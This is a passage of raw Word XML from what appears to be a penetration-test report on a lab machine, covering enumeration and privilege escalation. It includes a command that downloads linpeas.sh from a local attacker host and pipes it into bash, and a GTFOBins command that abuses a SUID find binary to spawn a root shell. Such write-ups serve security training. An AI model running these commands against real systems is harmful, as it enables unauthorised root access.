                  <wp:wrapTight wrapText="bothSides">
                    <wp:wrapPolygon edited="0">
                      <wp:start x="0" y="0"/>
                      <wp:lineTo x="0" y="21347"/>
                      <wp:lineTo x="21548" y="21347"/>
                      <wp:lineTo x="21548" y="0"/>
                      <wp:lineTo x="0" y="0"/>
                    </wp:wrapPolygon>
                  </wp:wrapTight>
                  <wp:docPr id="434322958" name="Picture 4" descr="A computer screen with a hand pointing at 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322958" name="Picture 4" descr="A computer screen with a hand pointing at it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8310" cy="1464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25BF74" w14:textId="77777777" w:rsidR="002A5519" w:rsidRPr="002A5519" w:rsidRDefault="002A5519" w:rsidP="00D65E85"/>
          <w:p w14:paraId="1C7766DA" w14:textId="77777777" w:rsidR="002A5519" w:rsidRPr="002A5519" w:rsidRDefault="002A5519" w:rsidP="00D65E85"/>
          <w:p w14:paraId="512CCDF3" w14:textId="77777777" w:rsidR="002A5519" w:rsidRDefault="002A5519" w:rsidP="00D65E85">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="21911AE0" w14:textId="77777777" w:rsidR="002A5519" w:rsidRDefault="002A5519" w:rsidP="00D65E85">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6DF98DDC" w14:textId="77777777" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="159D95F6" w14:textId="77777777" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="51C822F6" w14:textId="77777777" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="31855BB2" w14:textId="77777777" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0FE77730" w14:textId="77777777" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0DC50697" w14:textId="77777777" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="730879C0" w14:textId="4C7C8F6F" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Accessing and executing using curl</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AE3A0AC" w14:textId="77777777" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="29C62F59" w14:textId="77777777" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85"/>
          <w:p w14:paraId="03DF8DDA" w14:textId="76A4B522" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85">
            <w:r>
              <w:t>Commands:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6901D351" w14:textId="24E088E8" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85"/>
          <w:p w14:paraId="66103B45" w14:textId="1C48E0CE" w:rsidR="00F3791A" w:rsidRPr="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85">
            <w:r>
              <w:t xml:space="preserve">Curl </w:t>
            </w:r>
            <w:hyperlink r:id="rId24" w:history="1">
              <w:r w:rsidRPr="002317E6">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>http://192.168.138.128:8000/linpeas.sh</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve"> | bash -s -- -a</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="026D844C" w14:textId="14685ED5" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="43C24724" w14:textId="07272C42" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs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0119ACCD" wp14:editId="5A735B7E">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>46567</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>149437</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="5727700" cy="1570355"/>
                  <wp:effectExtent l="0" t="0" r="6350" b="0"/>
                  <wp:wrapTight wrapText="bothSides">
                    <wp:wrapPolygon edited="0">
                      <wp:start x="0" y="0"/>
                      <wp:lineTo x="0" y="21224"/>
                      <wp:lineTo x="21552" y="21224"/>
                      <wp:lineTo x="21552" y="0"/>
                      <wp:lineTo x="0" y="0"/>
                    </wp:wrapPolygon>
                  </wp:wrapTight>
                  <wp:docPr id="1628313267" name="Picture 5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8313267" name="Picture 5" descr="A screenshot of a computer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7700" cy="1570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2A2BAE7" w14:textId="19CCDBAA" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="18ABA523" w14:textId="77777777" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4DD57811" w14:textId="77777777" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="770550BC" w14:textId="77777777" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="22ED424A" w14:textId="77777777" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="50CBD76D" w14:textId="77777777" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="225E5D82" w14:textId="77777777" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="49DC1E7D" w14:textId="77777777" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0853902A" w14:textId="77777777" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="70CE7003" w14:textId="77777777" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="798ABDB6" w14:textId="77777777" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="67042100" w14:textId="77777777" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85"/>
          <w:p w14:paraId="684EFDBF" w14:textId="77777777" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85"/>
          <w:p w14:paraId="1B5A37B3" w14:textId="77777777" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85"/>
          <w:p w14:paraId="7867AEA3" w14:textId="77777777" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85"/>
          <w:p w14:paraId="6D118DFF" w14:textId="77777777" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85"/>
          <w:p w14:paraId="5CDB3468" w14:textId="77777777" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85"/>
          <w:p w14:paraId="38F3CF98" w14:textId="77777777" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85"/>
          <w:p w14:paraId="6957F2EC" w14:textId="77777777" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85"/>
          <w:p w14:paraId="56794B36" w14:textId="77777777" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85"/>
          <w:p w14:paraId="5347FB15" w14:textId="68DE0590" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85">
            <w:r>
              <w:t>Once the script had ran, I looked through the output and noticed an unusual binary (find) running with the SUID bit set (able to be run with root privileges)</w:t>
            </w:r>
            <w:r w:rsidR="0031029B">
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0576CBBA" w14:textId="77777777" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85"/>
          <w:p w14:paraId="709D3538" w14:textId="45DD7A7C" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251672576" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="77AA5822" wp14:editId="22D73BB2">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>-48472</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>157691</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="4792661" cy="588498"/>
                  <wp:effectExtent l="0" t="0" r="0" b="2540"/>
                  <wp:wrapTight wrapText="bothSides">
                    <wp:wrapPolygon edited="0">
                      <wp:start x="0" y="0"/>
                      <wp:lineTo x="0" y="20994"/>
                      <wp:lineTo x="21465" y="20994"/>
                      <wp:lineTo x="21465" y="0"/>
                      <wp:lineTo x="0" y="0"/>
                    </wp:wrapPolygon>
                  </wp:wrapTight>
                  <wp:docPr id="204675447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675447" name="Picture 204675447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2661" cy="588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4FE413B" w14:textId="0F351E72" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85"/>
          <w:p w14:paraId="66227B8C" w14:textId="3DB876EC" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85"/>
          <w:p w14:paraId="68048D9A" w14:textId="018C4266" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85"/>
          <w:p w14:paraId="08ACCC34" w14:textId="3D2FBA73" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85"/>
          <w:p w14:paraId="3DB4E188" w14:textId="1EE9FE72" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="771A44D5" w14:textId="77777777" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0F812FAE" w14:textId="28885D6D" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85">
            <w:r>
              <w:t xml:space="preserve">A quick search of </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>GTFO</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> bins turned up a privilege escalation vector using this binary</w:t>
            </w:r>
            <w:r w:rsidR="0031029B">
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45816909" w14:textId="30E8BEB9" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85"/>
          <w:p w14:paraId="7E2884A2" w14:textId="7FEB9451" w:rsidR="00F3791A" w:rsidRPr="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251673600" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="337E497F" wp14:editId="4E8EE1A5">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>95462</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>113454</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="5697855" cy="2912745"/>
                  <wp:effectExtent l="0" t="0" r="0" b="1905"/>
                  <wp:wrapTight wrapText="bothSides">
                    <wp:wrapPolygon edited="0">
                      <wp:start x="0" y="0"/>
                      <wp:lineTo x="0" y="21473"/>
                      <wp:lineTo x="21521" y="21473"/>
                      <wp:lineTo x="21521" y="0"/>
                      <wp:lineTo x="0" y="0"/>
                    </wp:wrapPolygon>
                  </wp:wrapTight>
                  <wp:docPr id="300622759" name="Picture 7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622759" name="Picture 7" descr="A screenshot of a computer program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7855" cy="2912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516866E" w14:textId="4CB462D7" w:rsidR="00F3791A" w:rsidRPr="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85"/>
          <w:p w14:paraId="5F249B20" w14:textId="35AED3B8" w:rsidR="00F3791A" w:rsidRPr="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85"/>
          <w:p w14:paraId="73ECCC3E" w14:textId="6316E211" w:rsidR="00F3791A" w:rsidRPr="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85"/>
          <w:p w14:paraId="4B1692B7" w14:textId="63BC1F9E" w:rsidR="00F3791A" w:rsidRPr="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85"/>
          <w:p w14:paraId="0141F8B6" w14:textId="4422B315" w:rsidR="00F3791A" w:rsidRPr="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85"/>
          <w:p w14:paraId="22E14A9B" w14:textId="77777777" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3C7D3A91" w14:textId="1A3D89D5" w:rsidR="00F3791A" w:rsidRPr="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85"/>
          <w:p w14:paraId="3E157CB3" w14:textId="77777777" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="76C51C75" w14:textId="77777777" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85"/>
          <w:p w14:paraId="2523D4DB" w14:textId="77777777" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85"/>
          <w:p w14:paraId="058220DF" w14:textId="77777777" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85"/>
          <w:p w14:paraId="166AA6BE" w14:textId="77777777" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85"/>
          <w:p w14:paraId="47BEBCF6" w14:textId="77777777" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85"/>
          <w:p w14:paraId="48FE015B" w14:textId="77777777" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85"/>
          <w:p w14:paraId="74F53A28" w14:textId="77777777" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85"/>
          <w:p w14:paraId="1BDA1777" w14:textId="77777777" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85"/>
          <w:p w14:paraId="08FF58E9" w14:textId="77777777" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85"/>
          <w:p w14:paraId="49D5AE78" w14:textId="77777777" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85"/>
          <w:p w14:paraId="12F70C59" w14:textId="77777777" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85"/>
          <w:p w14:paraId="27A60953" w14:textId="0AC35E02" w:rsidR="0031029B" w:rsidRDefault="0031029B" w:rsidP="00D65E85">
            <w:hyperlink r:id="rId28" w:history="1">
              <w:r w:rsidRPr="00C01F2C">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://gtfobins.github.io/gtfobins/find/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="189FBC0F" w14:textId="057225F7" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7947C792" w14:textId="11D60831" w:rsidR="002A5519" w:rsidRDefault="002A5519" w:rsidP="00D65E85">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="682F39E0" w14:textId="126691FA" w:rsidR="002A5519" w:rsidRDefault="002A5519" w:rsidP="002A5519">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc85467578"/>
      <w:r>
        <w:t>Privilege Escalation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="76CC406E" w14:textId="0D998C64" w:rsidR="002A5519" w:rsidRPr="002A5519" w:rsidRDefault="002A5519" w:rsidP="002A5519">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A5519">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="22B787"/>
        </w:rPr>
        <w:t>Guide</w:t>
      </w:r>
      <w:r w:rsidRPr="002A5519">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="002A5519">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Describe the steps you used to escalate your access from the initially compromised user to the root user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7"/>
      </w:tblGrid>
      <w:tr w:rsidR="002A5519" w14:paraId="68BEEBB2" w14:textId="77777777" w:rsidTr="002A5519">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10443" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="625CD721" w14:textId="77777777" w:rsidR="002A5519" w:rsidRPr="002A5519" w:rsidRDefault="002A5519" w:rsidP="00D65E85"/>
          <w:p w14:paraId="46398419" w14:textId="0072BD9F" w:rsidR="002A5519" w:rsidRDefault="00F3791A" w:rsidP="00D65E85">
            <w:r>
              <w:t xml:space="preserve">To escalate privileges, I ran the command listed under the SUID section of find from </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>GTFO</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> bins, making sure to modify it to include the full path of the binary. From there, my privileges were escalated to root.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76FE7A94" w14:textId="77777777" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85"/>
          <w:p w14:paraId="0330E2B9" w14:textId="35E9E574" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85">
            <w:r>
              <w:t>Commands:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F6F18C7" w14:textId="77777777" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85"/>
          <w:p w14:paraId="1903C9ED" w14:textId="7BBE82E6" w:rsidR="00F3791A" w:rsidRPr="002A5519" w:rsidRDefault="00263D13" w:rsidP="00D65E85">
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>usr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00F3791A">
              <w:t>/bin</w:t>
            </w:r>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t xml:space="preserve">find </w:t>
            </w:r>
            <w:r w:rsidRPr="00263D13">
              <w:t>.</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00263D13">
              <w:t xml:space="preserve"> -exec /bin/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00263D13">
              <w:t>sh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00263D13">
              <w:t xml:space="preserve"> -p \; -quit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BEB50D6" w14:textId="03574310" w:rsidR="002A5519" w:rsidRDefault="002A5519" w:rsidP="00D65E85">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="45B463B3" w14:textId="34B1A624" w:rsidR="005D1FD4" w:rsidRDefault="005D1FD4" w:rsidP="00D65E85">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="66846B1E" w14:textId="0CBC50F3" w:rsidR="005D1FD4" w:rsidRDefault="005D1FD4" w:rsidP="00D65E85">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="50FD65F1" w14:textId="366335AB" w:rsidR="002A5519" w:rsidRDefault="002A5519" w:rsidP="00D65E85">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="48E095CC" w14:textId="708A0D1A" w:rsidR="00F3791A" w:rsidRDefault="00263D13" w:rsidP="00D65E85">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251674624" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5540B915" wp14:editId="44D8A5E9">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>78740</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>59690</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="5817235" cy="914400"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapTight wrapText="bothSides">
                    <wp:wrapPolygon edited="0">
                      <wp:start x="0" y="0"/>
                      <wp:lineTo x="0" y="21150"/>
                      <wp:lineTo x="21503" y="21150"/>
                      <wp:lineTo x="21503" y="0"/>
                      <wp:lineTo x="0" y="0"/>
                    </wp:wrapPolygon>
                  </wp:wrapTight>
                  <wp:docPr id="2131987272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1987272" name="Picture 8" descr="A screenshot of a computer&#10;&#10;Description automatically generated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7235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1E90A80B" w14:textId="28877B18" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="389F3D28" w14:textId="5EA168B8" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="466C5BAA" w14:textId="4D56D621" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="583412C9" w14:textId="7454155F" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7E525AB9" w14:textId="5DA6010B" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="31855C6A" w14:textId="77777777" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2CE80C56" w14:textId="77777777" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4F857964" w14:textId="40DDBA92" w:rsidR="00F3791A" w:rsidRPr="00263D13" w:rsidRDefault="00263D13" w:rsidP="00D65E85">
            <w:r>
              <w:t>I now had full control of the system including unrestricted access to all resources.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27C26C3B" w14:textId="30604DE9" w:rsidR="00F3791A" w:rsidRDefault="00F3791A" w:rsidP="00D65E85">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5B04F4C6" w14:textId="59AC8B31" w:rsidR="002A5519" w:rsidRDefault="002A5519" w:rsidP="00D65E85">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53BE0C33" w14:textId="0EBDEB56" w:rsidR="00250232" w:rsidRPr="002A5519" w:rsidRDefault="00250232" w:rsidP="00250232">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc85467579"/>
      <w:r>
        <w:t>Risks</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="3CE6F411" w14:textId="3EE13D53" w:rsidR="00250232" w:rsidRPr="002A5519" w:rsidRDefault="00250232" w:rsidP="00250232">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A5519">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="22B787"/>
        </w:rPr>
        <w:t>Guide</w:t>
      </w:r>
      <w:r w:rsidRPr="002A5519">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="002A5519">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00282B6F" w:rsidRPr="00282B6F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="00282B6F">
